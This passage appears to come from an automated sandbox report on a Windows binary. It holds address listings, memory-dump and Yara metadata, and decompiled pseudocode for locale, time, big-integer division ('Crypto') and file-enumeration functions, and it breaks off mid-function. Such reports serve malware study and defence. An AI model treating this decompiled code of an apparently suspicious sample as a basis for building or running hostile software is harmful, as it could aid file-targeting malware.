                                            0x0043c32b
                                            0x0043c32b
                                            0x0043c331
                                            0x0043c336
                                            0x0043c339
                                            0x0043c33b
                                            0x0043c372
                                            0x0043c374
                                            0x0043c375
                                            0x0043c376
                                            0x0043c377
                                            0x0043c378
                                            0x0043c379
                                            0x0043c37e
                                            0x0043c382
                                            0x0043c384
                                            0x0043c38a
                                            0x0043c391
                                            0x0043c394
                                            0x0043c397
                                            0x0043c398
                                            0x0043c39b
                                            0x0043c39c
                                            0x0043c39f
                                            0x0043c3a0
                                            0x0043c3c1
                                            0x0043c3c1
                                            0x0043c3c3
                                            0x00000000
                                            0x00000000
                                            0x0043c3a8
                                            0x0043c3aa
                                            0x0043c3ac
                                            0x0043c3ae
                                            0x0043c3b0
                                            0x0043c3b2
                                            0x0043c3b4
                                            0x0043c3bf
                                            0x00000000
                                            0x0043c3bf
                                            0x0043c3b4
                                            0x0043c3b0
                                            0x00000000
                                            0x0043c3ac
                                            0x0043c3c5
                                            0x0043c3c7
                                            0x0043c3ca
                                            0x0043c3e3
                                            0x0043c3e3
                                            0x0043c3e5
                                            0x0043c3e8
                                            0x0043c3f8
                                            0x0043c3fa
                                            0x0043c3fa
                                            0x0043c3ea
                                            0x0043c3ea
                                            0x0043c3ed
                                            0x00000000
                                            0x0043c3ef
                                            0x0043c3ef
                                            0x0043c3f2
                                            0x00000000
                                            0x0043c3f4
                                            0x0043c3f4
                                            0x0043c3f4
                                            0x0043c3f2
                                            0x0043c3ed
                                            0x0043c400
                                            0x0043c408
                                            0x0043c40c
                                            0x0043c41a
                                            0x0043c41f
                                            0x0043c434
                                            0x0043c436
                                            0x0043c43c
                                            0x0043c43f
                                            0x0043c471
                                            0x0043c471
                                            0x0043c473
                                            0x0043c476
                                            0x0043c47c
                                            0x0043c47c
                                            0x0043c483
                                            0x0043c49d
                                            0x0043c49d
                                            0x0043c4ac
                                            0x0043c4b1
                                            0x0043c4b4
                                            0x0043c4b6
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x0043c485
                                            0x0043c485
                                            0x0043c48b
                                            0x0043c48d
                                            0x00000000
                                            0x0043c48f
                                            0x0043c48f
                                            0x0043c492
                                            0x00000000
                                            0x0043c494
                                            0x0043c494
                                            0x0043c49b
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x0043c49b
                                            0x0043c492
                                            0x0043c48d
                                            0x00000000
                                            0x0043c4b8
                                            0x0043c4c0
                                            0x0043c4c6
                                            0x0043c4c8
                                            0x0043c4c8
                                            0x0043c4d0
                                            0x0043c4d5
                                            0x0043c4dd
                                            0x0043c4e0
                                            0x0043c4e2
                                            0x0043c4f6
                                            0x0043c4fb
                                            0x0043c441
                                            0x0043c441
                                            0x0043c445
                                            0x0043c44d
                                            0x0043c44d
                                            0x0043c44d
                                            0x0043c44f
                                            0x0043c452
                                            0x0043c455
                                            0x0043c455
                                            0x0043c3cc
                                            0x0043c3cf
                                            0x0043c3d1
                                            0x00000000
                                            0x0043c3d3
                                            0x0043c3d3
                                            0x0043c3d9
                                            0x0043c3de
                                            0x0043c3d1
                                            0x0043c462
                                            0x0043c46d
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x0043c33b
                                            0x0043c30f
                                            0x0043c311
                                            0x0043c36d
                                            0x0043c371
                                            0x0043c371
                                            0x00000000

                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.912203016.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000002.00000002.912191905.0000000000400000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912239074.0000000000449000.00000002.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912258452.000000000045F000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912271649.0000000000464000.00000002.00000001.sdmp Download File
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID: .
                                            • API String ID: 0-248832578
                                            • Opcode ID: 47ffccddbc289f2cd79265d6a9c2e5f34eb7cc0abcc808246990a086a1e76a18
                                            • Instruction ID: d7b811e6841268084740e51df683ddb87951cc4c9d9fd1dea4e85c2c95bf06c9
                                            • Opcode Fuzzy Hash: 47ffccddbc289f2cd79265d6a9c2e5f34eb7cc0abcc808246990a086a1e76a18
                                            • Instruction Fuzzy Hash: 6F310472900209AFDB249E79CC84EFF7BBDDB8A314F0451AEE818E7251E6349D448B54
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 004380A8, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 37COMMON
                                            Download Yara Rule
                                            APIs
                                            • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,004354F2,?,00000004), ref: 004380FB
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.912203016.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000002.00000002.912191905.0000000000400000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912239074.0000000000449000.00000002.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912258452.000000000045F000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912271649.0000000000464000.00000002.00000001.sdmp Download File
                                            Yara matches
                                            Similarity
                                            • API ID: InfoLocale
                                            • String ID: GetLocaleInfoEx
                                            • API String ID: 2299586839-2904428671
                                            • Opcode ID: 7d7c78036e3df44f055bd1815ef721dad49af35ef3d865818b10530387d50d97
                                            • Instruction ID: bf8b94e3e746181dfd5f10cbf226b43160d7f687befc60661714ac695b46125a
                                            • Opcode Fuzzy Hash: 7d7c78036e3df44f055bd1815ef721dad49af35ef3d865818b10530387d50d97
                                            • Instruction Fuzzy Hash: E4F0C231A40218BBDB11AF529C06F6E7B61EF48B10F04411EFC0566291CE7A5D20A69D
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00438112, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30timeCOMMON
                                            Download Yara Rule
                                            APIs
                                            • GetSystemTimeAsFileTime.KERNEL32(00000000,00433360), ref: 00438151
                                            Strings
                                            • GetSystemTimePreciseAsFileTime, xrefs: 0043812D
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.912203016.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000002.00000002.912191905.0000000000400000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912239074.0000000000449000.00000002.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912258452.000000000045F000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912271649.0000000000464000.00000002.00000001.sdmp Download File
                                            Yara matches
                                            Similarity
                                            • API ID: Time$FileSystem
                                            • String ID: GetSystemTimePreciseAsFileTime
                                            • API String ID: 2086374402-595813830
                                            • Opcode ID: c7c40a0053ec5d3d472b6cc6baaa7365702136a4453c6e022f25d4a10b819515
                                            • Instruction ID: ee94dd896335a33b0e141810a9f6b32c09d86f05abab24e929121c5942c65aba
                                            • Opcode Fuzzy Hash: c7c40a0053ec5d3d472b6cc6baaa7365702136a4453c6e022f25d4a10b819515
                                            • Instruction Fuzzy Hash: 1FE0A031B412187BAB11AF12AC0AA3EBB50EF49B10F14056FFC055B281DE794D11A6DE
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00436FF0, Relevance: 3.5, APIs: 2, Instructions: 464COMMONCrypto
                                            Download Yara Rule
                                            C-Code - Quality: 90%
                                            			E00436FF0(signed int* _a4, signed int* _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int* _v80;
				char _v540;
				signed int _v544;
				signed int _t197;
				signed int _t198;
				signed int* _t200;
				signed int _t201;
				signed int _t204;
				signed int _t206;
				signed int _t208;
				signed int _t209;
				signed int _t213;
				signed int _t219;
				intOrPtr _t225;
				void* _t228;
				signed int _t230;
				signed int _t247;
				signed int _t250;
				void* _t253;
				signed int _t256;
				signed int* _t262;
				signed int _t263;
				signed int _t264;
				void* _t265;
				intOrPtr* _t266;
				signed int _t267;
				signed int _t269;
				signed int _t270;
				signed int _t271;
				signed int _t272;
				signed int* _t274;
				signed int* _t278;
				signed int _t279;
				signed int _t280;
				intOrPtr _t282;
				void* _t286;
				signed char _t292;
				signed int _t295;
				signed int _t303;
				signed int _t306;
				signed int _t307;
				signed int _t309;
				signed int _t311;
				signed int _t313;
				intOrPtr* _t314;
				signed int _t318;
				signed int _t322;
				signed int* _t328;
				signed int _t330;
				signed int _t331;
				signed int _t333;
				void* _t334;
				signed int _t336;
				signed int _t338;
				signed int _t341;
				signed int _t342;
				signed int* _t344;
				signed int _t349;
				signed int _t351;
				void* _t355;
				signed int _t359;
				signed int _t360;
				signed int _t362;
				signed int* _t368;
				signed int* _t369;
				signed int* _t370;
				signed int* _t373;

				_t262 = _a4;
				_t197 =  *_t262;
				if(_t197 != 0) {
					_t328 = _a8;
					_t267 =  *_t328;
					__eflags = _t267;
					if(_t267 != 0) {
						_t3 = _t197 - 1; // -1
						_t349 = _t3;
						_t4 = _t267 - 1; // -1
						_t198 = _t4;
						_v16 = _t349;
						__eflags = _t198;
						if(_t198 != 0) {
							__eflags = _t198 - _t349;
							if(_t198 > _t349) {
								L23:
								__eflags = 0;
								return 0;
							} else {
								_t46 = _t198 + 1; // 0x0
								_t306 = _t349 - _t198;
								_v60 = _t46;
								_t269 = _t349;
								__eflags = _t349 - _t306;
								if(_t349 < _t306) {
									L21:
									_t306 = _t306 + 1;
									__eflags = _t306;
								} else {
									_t368 =  &(_t262[_t349 + 1]);
									_t341 =  &(( &(_t328[_t269 - _t306]))[1]);
									__eflags = _t341;
									while(1) {
										__eflags =  *_t341 -  *_t368;
										if( *_t341 !=  *_t368) {
											break;
										}
										_t269 = _t269 - 1;
										_t341 = _t341 - 4;
										_t368 = _t368 - 4;
										__eflags = _t269 - _t306;
										if(_t269 >= _t306) {
											continue;
										} else {
											goto L21;
										}
										goto L22;
									}
									_t369 = _a8;
									_t54 = (_t269 - _t306) * 4; // 0xfc23b5a
									__eflags =  *((intOrPtr*)(_t369 + _t54 + 4)) -  *((intOrPtr*)(_t262 + 4 + _t269 * 4));
									if( *((intOrPtr*)(_t369 + _t54 + 4)) <  *((intOrPtr*)(_t262 + 4 + _t269 * 4))) {
										goto L21;
									}
								}
								L22:
								__eflags = _t306;
								if(__eflags != 0) {
									_t330 = _v60;
									_t200 = _a8;
									_t351 =  *(_t200 + _t330 * 4);
									_t64 = _t330 * 4; // 0xffff2d6d
									_t201 =  *((intOrPtr*)(_t200 + _t64 - 4));
									_v36 = _t201;
									asm("bsr eax, esi");
									_v56 = _t351;
									if(__eflags == 0) {
										_t270 = 0x20;
									} else {
										_t270 = 0x1f - _t201;
									}
									_v40 = _t270;
									_v64 = 0x20 - _t270;
									__eflags = _t270;
									if(_t270 != 0) {
										_t292 = _v40;
										_v36 = _v36 << _t292;
										_v56 = _t351 << _t292 | _v36 >> _v64;
										__eflags = _t330 - 2;
										if(_t330 > 2) {
											_t79 = _t330 * 4; // 0xe850ffff
											_t81 =  &_v36;
											 *_t81 = _v36 |  *(_a8 + _t79 - 8) >> _v64;
											__eflags =  *_t81;
										}
									}
									_v76 = 0;
									_t307 = _t306 + 0xffffffff;
									__eflags = _t307;
									_v32 = _t307;
									if(_t307 < 0) {
										_t331 = 0;
										__eflags = 0;
									} else {
										_t85 =  &(_t262[1]); // 0x4
										_v20 =  &(_t85[_t307]);
										_t206 = _t307 + _t330;
										_t90 = _t262 - 4; // -4
										_v12 = _t206;
										_t278 = _t90 + _t206 * 4;
										_v80 = _t278;
										do {
											__eflags = _t206 - _v16;
											if(_t206 > _v16) {
												_t207 = 0;
												__eflags = 0;
											} else {
												_t207 = _t278[2];
											}
											__eflags = _v40;
											_t311 = _t278[1];
											_t279 =  *_t278;
											_v52 = _t207;
											_v44 = 0;
											_v8 = _t207;
											_v24 = _t279;
											if(_v40 > 0) {
												_t318 = _v8;
												_t336 = _t279 >> _v64;
												_t230 = E00447220(_t311, _v40, _t318);
												_t279 = _v40;
												_t207 = _t318;
												_t311 = _t336 | _t230;
												_t359 = _v24 << _t279;
												__eflags = _v12 - 3;
												_v8 = _t318;
												_v24 = _t359;
												if(_v12 >= 3) {
													_t279 = _v64;
													_t360 = _t359 |  *(_t262 + (_v60 + _v32) * 4 - 8) >> _t279;
													__eflags = _t360;
													_t207 = _v8;
													_v24 = _t360;
												}
											}
											_t208 = E00446F60(_t311, _t207, _v56, 0);
											_v44 = _t262;
											_t263 = _t208;
											_v44 = 0;
											_t209 = _t311;
											_v8 = _t263;
											_v28 = _t209;
											_t333 = _t279;
											_v72 = _t263;
											_v68 = _t209;
											__eflags = _t209;
											if(_t209 != 0) {
												L40:
												_t264 = _t263 + 1;
												asm("adc eax, 0xffffffff");
												_t333 = _t333 + E00446D60(_t264, _t209, _v56, 0);
												asm("adc esi, edx");
												_t263 = _t264 | 0xffffffff;
												_t209 = 0;
												__eflags = 0;
												_v44 = 0;
												_v8 = _t263;
												_v72 = _t263;
												_v28 = 0;
												_v68 = 0;
											} else {
												__eflags = _t263 - 0xffffffff;
												if(_t263 > 0xffffffff) {
													goto L40;
												}
											}
											__eflags = 0;
											if(0 <= 0) {
												if(0 < 0) {
													goto L44;
												} else {
													__eflags = _t333 - 0xffffffff;
													if(_t333 <= 0xffffffff) {
														while(1) {
															L44:
															_v8 = _v24;
															_t228 = E00446D60(_v36, 0, _t263, _t209);
															__eflags = _t311 - _t333;
															if(__eflags < 0) {
																break;
															}
															if(__eflags > 0) {
																L47:
																_t209 = _v28;
																_t263 = _t263 + 0xffffffff;
																_v72 = _t263;
																asm("adc eax, 0xffffffff");
																_t333 = _t333 + _v56;
																__eflags = _t333;
																_v28 = _t209;
																asm("adc dword [ebp-0x28], 0x0");
																_v68 = _t209;
																if(_t333 == 0) {
																	__eflags = _t333 - 0xffffffff;
																	if(_t333 <= 0xffffffff) {
																		continue;
																	} else {
																	}
																}
															} else {
																__eflags = _t228 - _v8;
																if(_t228 <= _v8) {
																	break;
																} else {
																	goto L47;
																}
															}
															L51:
															_v8 = _t263;
															goto L52;
														}
														_t209 = _v28;
														goto L51;
													}
												}
											}
											L52:
											__eflags = _t209;
											if(_t209 != 0) {
												L54:
												_t280 = _v60;
												_t334 = 0;
												_t355 = 0;
												__eflags = _t280;
												if(_t280 != 0) {
													_t266 = _v20;
													_t219 =  &(_a8[1]);
													__eflags = _t219;
													_v24 = _t219;
													_v16 = _t280;
													do {
														_v44 =  *_t219;
														_t225 =  *_t266;
														_t286 = _t334 + _v72 * _v44;
														asm("adc esi, edx");
														_t334 = _t355;
														_t355 = 0;
														__eflags = _t225 - _t286;
														if(_t225 < _t286) {
															_t334 = _t334 + 1;
															asm("adc esi, esi");
														}
														 *_t266 = _t225 - _t286;
														_t266 = _t266 + 4;
														_t219 = _v24 + 4;
														_t164 =  &_v16;
														 *_t164 = _v16 - 1;
														__eflags =  *_t164;
														_v24 = _t219;
													} while ( *_t164 != 0);
													_t263 = _v8;
													_t280 = _v60;
												}
												__eflags = 0 - _t355;
												if(__eflags <= 0) {
													if(__eflags < 0) {
														L63:
														__eflags = _t280;
														if(_t280 != 0) {
															_t338 = _t280;
															_t314 = _v20;
															_t362 =  &(_a8[1]);
															__eflags = _t362;
															_t265 = 0;
															do {
																_t282 =  *_t314;
																_t172 = _t362 + 4; // 0xa6a5959
																_t362 = _t172;
																_t314 = _t314 + 4;
																asm("adc eax, eax");
																 *((intOrPtr*)(_t314 - 4)) = _t282 +  *((intOrPtr*)(_t362 - 4)) + _t265;
																asm("adc eax, 0x0");
																_t265 = 0;
																_t338 = _t338 - 1;
																__eflags = _t338;
															} while (_t338 != 0);
															_t263 = _v8;
														}
														_t263 = _t263 + 0xffffffff;
														asm("adc dword [ebp-0x18], 0xffffffff");
													} else {
														__eflags = _v52 - _t334;
														if(_v52 < _t334) {
															goto L63;
														}
													}
												}
												_t213 = _v12 - 1;
												__eflags = _t213;
												_v16 = _t213;
											} else {
												__eflags = _t263;
												if(_t263 != 0) {
													goto L54;
												}
											}
											_t331 = 0 + _t263;
											asm("adc esi, 0x0");
											_v20 = _v20 - 4;
											_t313 = _v32 - 1;
											_t262 = _a4;
											_t278 = _v80 - 4;
											_t206 = _v12 - 1;
											_v76 = _t331;
											_v32 = _t313;
											_v80 = _t278;
											_v12 = _t206;
											__eflags = _t313;
										} while (_t313 >= 0);
									}
									_t309 = _v16 + 1;
									_t204 = _t309;
									__eflags = _t204 -  *_t262;
									if(_t204 <  *_t262) {
										_t191 = _t204 + 1; // 0x444285
										_t274 =  &(_t262[_t191]);
										do {
											 *_t274 = 0;
											_t194 =  &(_t274[1]); // 0x91850fc2
											_t274 = _t194;
											_t204 = _t204 + 1;
											__eflags = _t204 -  *_t262;
										} while (_t204 <  *_t262);
									}
									 *_t262 = _t309;
									__eflags = _t309;
									if(_t309 != 0) {
										while(1) {
											_t271 =  *_t262;
											__eflags = _t262[_t271];
											if(_t262[_t271] != 0) {
												goto L78;
											}
											_t272 = _t271 + 0xffffffff;
											__eflags = _t272;
											 *_t262 = _t272;
											if(_t272 != 0) {
												continue;
											}
											goto L78;
										}
									}
									L78:
									return _t331;
								} else {
									goto L23;
								}
							}
						} else {
							_t6 =  &(_t328[1]); // 0xfc23b5a
							_t295 =  *_t6;
							_v44 = _t295;
							__eflags = _t295 - 1;
							if(_t295 != 1) {
								__eflags = _t349;
								if(_t349 != 0) {
									_t342 = 0;
									_v12 = 0;
									_v8 = 0;
									_v20 = 0;
									__eflags = _t349 - 0xffffffff;
									if(_t349 != 0xffffffff) {
										_t250 = _v16 + 1;
										__eflags = _t250;
										_v32 = _t250;
										_t373 =  &(_t262[_t349 + 1]);
										do {
											_t253 = E00446F60( *_t373, _t342, _t295, 0);
											_v68 = _t303;
											_t373 = _t373 - 4;
											_v20 = _t262;
											_t342 = _t295;
											_t303 = 0 + _t253;
											asm("adc ecx, 0x0");
											_v12 = _t303;
											_t34 =  &_v32;
											 *_t34 = _v32 - 1;
											__eflags =  *_t34;
											_v8 = _v12;
											_t295 = _v44;
										} while ( *_t34 != 0);
										_t262 = _a4;
									}
									_v544 = 0;
									_t41 =  &(_t262[1]); // 0x4
									_t370 = _t41;
									 *_t262 = 0;
									E004444B2(_t370, 0x1cc,  &_v540, 0);
									_t247 = _v20;
									__eflags = 0 - _t247;
									 *_t370 = _t342;
									_t262[2] = _t247;
									asm("sbb ecx, ecx");
									__eflags =  ~0x00000000;
									 *_t262 = 0xbadbae;
									return _v12;
								} else {
									_t14 =  &(_t262[1]); // 0x4
									_t344 = _t14;
									_v544 = 0;
									 *_t262 = 0;
									E004444B2(_t344, 0x1cc,  &_v540, 0);
									_t256 = _t262[1];
									_t322 = _t256 % _v44;
									__eflags = 0 - _t322;
									 *_t344 = _t322;
									asm("sbb ecx, ecx");
									__eflags = 0;
									 *_t262 =  ~0x00000000;
									return _t256 / _v44;
								}
							} else {
								_t9 =  &(_t262[1]); // 0x4
								_v544 = _t198;
								 *_t262 = _t198;
								E004444B2(_t9, 0x1cc,  &_v540, _t198);
								__eflags = 0;
								return _t262[1];
							}
						}
					} else {
						__eflags = 0;
						return 0;
					}
				} else {
					return _t197;
				}
			}























































































                                            0x00436ffc
                                            0x00436fff
                                            0x00437003
                                            0x0043700d
                                            0x00437010
                                            0x00437012
                                            0x00437014
                                            0x00437021
                                            0x00437021
                                            0x00437024
                                            0x00437024
                                            0x00437027
                                            0x0043702a
                                            0x0043702c
                                            0x0043715f
                                            0x00437161
                                            0x004371aa
                                            0x004371ae
                                            0x004371b4
                                            0x00437163
                                            0x00437165
                                            0x00437168
                                            0x0043716a
                                            0x0043716d
                                            0x0043716f
                                            0x00437171
                                            0x004371a5
                                            0x004371a5
                                            0x004371a5
                                            0x00437173
                                            0x00437178
                                            0x0043717e
                                            0x0043717e
                                            0x00437181
                                            0x00437183
                                            0x00437185
                                            0x00000000
                                            0x00000000
                                            0x00437187
                                            0x00437188
                                            0x0043718b
                                            0x0043718e
                                            0x00437190
                                            0x00000000
                                            0x00437192
                                            0x00000000
                                            0x00437192
                                            0x00000000
                                            0x00437190
                                            0x00437194
                                            0x0043719b
                                            0x0043719f
                                            0x004371a3
                                            0x00000000
                                            0x00000000
                                            0x004371a3
                                            0x004371a6
                                            0x004371a6
                                            0x004371a8
                                            0x004371b5
                                            0x004371b8
                                            0x004371bb
                                            0x004371be
                                            0x004371be
                                            0x004371c2
                                            0x004371c5
                                            0x004371c8
                                            0x004371cb
                                            0x004371d6
                                            0x004371cd
                                            0x004371d2
                                            0x004371d2
                                            0x004371e0
                                            0x004371e5
                                            0x004371e8
                                            0x004371ea
                                            0x004371f4
                                            0x004371f7
                                            0x004371fe
                                            0x00437201
                                            0x00437204
                                            0x0043720c
                                            0x00437212
                                            0x00437212
                                            0x00437212
                                            0x00437212
                                            0x00437204
                                            0x00437217
                                            0x0043721e
                                            0x0043721e
                                            0x00437221
                                            0x00437224
                                            0x00437456
                                            0x00437456
                                            0x0043722a
                                            0x0043722a
                                            0x00437230
                                            0x00437233
                                            0x00437236
                                            0x00437239
                                            0x0043723c
                                            0x0043723f
                                            0x00437242
                                            0x00437242
                                            0x00437245
                                            0x0043724c
                                            0x0043724c
                                            0x00437247
                                            0x00437247
                                            0x00437247
                                            0x0043724e
                                            0x00437252
                                            0x00437255
                                            0x00437257
                                            0x0043725a
                                            0x00437261
                                            0x00437264
                                            0x00437267
                                            0x00437272
                                            0x00437275
                                            0x0043727a
                                            0x0043727f
                                            0x00437286
                                            0x0043728b
                                            0x0043728d
                                            0x0043728f
                                            0x00437293
                                            0x00437296
                                            0x00437299
                                            0x004372a1
                                            0x004372aa
                                            0x004372aa
                                            0x004372ac
                                            0x004372af
                                            0x004372af
                                            0x00437299
                                            0x004372b9
                                            0x004372be
                                            0x004372c3
                                            0x004372c5
                                            0x004372c8
                                            0x004372ca
                                            0x004372cd
                                            0x004372d0
                                            0x004372d2
                                            0x004372d5
                                            0x004372d8
                                            0x004372da
                                            0x004372e1
                                            0x004372e6
                                            0x004372e9
                                            0x004372f3
                                            0x004372f5
                                            0x004372f7
                                            0x004372fa
                                            0x004372fa
                                            0x004372fc
                                            0x004372ff
                                            0x00437302
                                            0x00437305
                                            0x00437308
                                            0x004372dc
                                            0x004372dc
                                            0x004372df
                                            0x00000000
                                            0x00000000
                                            0x004372df
                                            0x0043730b
                                            0x0043730d
                                            0x0043730f
                                            0x00000000
                                            0x00437311
                                            0x00437311
                                            0x00437314
                                            0x00437316
                                            0x00437316
                                            0x00437324
                                            0x00437327
                                            0x0043732c
                                            0x0043732e
                                            0x00000000
                                            0x00000000
                                            0x00437330
                                            0x00437337
                                            0x00437337
                                            0x0043733a
                                            0x0043733d
                                            0x00437340
                                            0x00437343
                                            0x00437343
                                            0x00437346
                                            0x00437349
                                            0x0043734d
                                            0x00437350
                                            0x00437352
                                            0x00437355
                                            0x00000000
                                            0x00000000
                                            0x00437357
                                            0x00437355
                                            0x00437332
                                            0x00437332
                                            0x00437335
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00437335
                                            0x0043735c
                                            0x0043735c
                                            0x00000000
                                            0x0043735c
                                            0x00437359
                                            0x00000000
                                            0x00437359
                                            0x00437314
                                            0x0043730f
                                            0x0043735f
                                            0x0043735f
                                            0x00437361
                                            0x0043736b
                                            0x0043736b
                                            0x0043736e
                                            0x00437370
                                            0x00437372
                                            0x00437374
                                            0x00437379
                                            0x0043737c
                                            0x0043737c
                                            0x0043737f
                                            0x00437382
                                            0x00437385
                                            0x00437387
                                            0x0043739c
                                            0x0043739e
                                            0x004373a0
                                            0x004373a2
                                            0x004373a4
                                            0x004373a6
                                            0x004373a8
                                            0x004373aa
                                            0x004373ad
                                            0x004373ad
                                            0x004373b1
                                            0x004373b3
                                            0x004373b9
                                            0x004373bc
                                            0x004373bc
                                            0x004373bc
                                            0x004373c0
                                            0x004373c0
                                            0x004373c5
                                            0x004373c8
                                            0x004373c8
                                            0x004373cd
                                            0x004373cf
                                            0x004373d1
                                            0x004373d8
                                            0x004373d8
                                            0x004373da
                                            0x004373df
                                            0x004373e1
                                            0x004373e4
                                            0x004373e4
                                            0x004373e7
                                            0x004373f0
                                            0x004373f0
                                            0x004373f2
                                            0x004373f2
                                            0x004373f7
                                            0x004373fd
                                            0x00437401
                                            0x00437404
                                            0x00437407
                                            0x00437409
                                            0x00437409
                                            0x00437409
                                            0x0043740e
                                            0x0043740e
                                            0x00437411
                                            0x00437414
                                            0x004373d3
                                            0x004373d3
                                            0x004373d6
                                            0x00000000
                                            0x00000000
                                            0x004373d6
                                            0x004373d1
                                            0x0043741b
                                            0x0043741b
                                            0x0043741c
                                            0x00437363
                                            0x00437363
                                            0x00437365
                                            0x00000000
                                            0x00000000
                                            0x00437365
                                            0x0043742c
                                            0x00437431
                                            0x00437434
                                            0x00437438
                                            0x00437439
                                            0x0043743c
                                            0x0043743f
                                            0x00437440
                                            0x00437443
                                            0x00437446
                                            0x00437449
                                            0x0043744c
                                            0x0043744c
                                            0x00437454
                                            0x0043745b
                                            0x0043745c
                                            0x0043745e
                                            0x00437460
                                            0x00437462
                                            0x00437465
                                            0x00437470
                                            0x00437470
                                            0x00437476
                                            0x00437476
                                            0x00437479
                                            0x0043747a
                                            0x0043747a
                                            0x00437470
                                            0x0043747e
                                            0x00437480
                                            0x00437482
                                            0x00437484
                                            0x00437484
                                            0x00437486
                                            0x0043748a
                                            0x00000000
                                            0x00000000
                                            0x0043748c
                                            0x0043748c
                                            0x0043748f
                                            0x00437491
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00437491
                                            0x00437484
                                            0x00437493
                                            0x0043749d
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x004371a8
                                            0x00437032
                                            0x00437032
                                            0x00437032
                                            0x00437035
                                            0x00437038
                                            0x0043703b
                                            0x0043706c
                                            0x0043706e
                                            0x004370b9
                                            0x004370bb
                                            0x004370c2
                                            0x004370c9
                                            0x004370cc
                                            0x004370cf
                                            0x004370d5
                                            0x004370d5
                                            0x004370d6
                                            0x004370d9
                                            0x004370e0
                                            0x004370e9
                                            0x004370ee
                                            0x004370f1
                                            0x004370f6
                                            0x004370f9
                                            0x004370fb
                                            0x00437100
                                            0x00437103
                                            0x00437106
                                            0x00437106
                                            0x00437106
                                            0x0043710a
                                            0x0043710d
                                            0x0043710d
                                            0x00437112
                                            0x00437112
                                            0x0043711d
                                            0x00437128
                                            0x00437128
                                            0x0043712b
                                            0x00437137
                                            0x0043713c
                                            0x00437147
                                            0x00437149
                                            0x0043714b
                                            0x00437151
                                            0x00437156
                                            0x00437158
                                            0x0043715e
                                            0x00437070
                                            0x0043707c
                                            0x0043707c
                                            0x0043707f
                                            0x0043708f
                                            0x00437095
                                            0x0043709c
                                            0x0043709e
                                            0x004370a6
                                            0x004370a8
                                            0x004370aa
                                            0x004370af
                                            0x004370b2
                                            0x004370b8
                                            0x004370b8
                                            0x0043703d
                                            0x00437040
                                            0x00437044
                                            0x0043704a
                                            0x00437059
                                            0x00437063
                                            0x0043706b
                                            0x0043706b
                                            0x0043703b
                                            0x00437016
                                            0x00437019
                                            0x0043701f
                                            0x0043701f
                                            0x00437005
                                            0x0043700b
                                            0x0043700b

                                            Memory Dump Source
                                            • Source File: 00000002.00000002.912203016.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000002.00000002.912191905.0000000000400000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912239074.0000000000449000.00000002.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912258452.000000000045F000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912271649.0000000000464000.00000002.00000001.sdmp Download File
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 015c551734d20d8771bde14bedfb9515c5b278558ebae6118cb0e0d860ad543f
                                            • Instruction ID: 957acc4678adef87b14f4c5b891760a872c3653d0a894db7231a6384b839582e
                                            • Opcode Fuzzy Hash: 015c551734d20d8771bde14bedfb9515c5b278558ebae6118cb0e0d860ad543f
                                            • Instruction Fuzzy Hash: 0C024EB1E042199BDF24CFA9C9806AEBBF1FF48324F25816AD859E7344D734A941CB94
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 004041E6, Relevance: 3.1, APIs: 2, Instructions: 86fileCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 82%
                                            			E004041E6(char _a4) {
				char _v28;
				char _v52;
				char _v76;
				struct _WIN32_FIND_DATAW _v668;
				void* __ebx;
				void* __esi;
				int _t29;
				void* _t34;
				void* _t49;
				void* _t73;
				void* _t74;

				_t73 = FindFirstFileW(L00404090( &_a4),  &_v668);
				_t77 = _t73 - 0xffffffff;
				if(_t73 != 0xffffffff) {
					E004020CF(_t49,  &_v28);
					E004031DB(_t49,  &_v52,  &(_v668.cFileName));
					_t71 = ".";
					_t29 = E00405864(__eflags);
					_t50 = _t29;
					E004031D1();
					__eflags = _t29;
					if(__eflags != 0) {
						E00401FA1( &_v28, ".", _t73, E004020A5(_t50,  &_v52, ".", __eflags,  &_v668, 0x250));
						L5:
						E00401F97();
					}
					__eflags = FindNextFileW(_t73,  &_v668);
					if(__eflags != 0) {
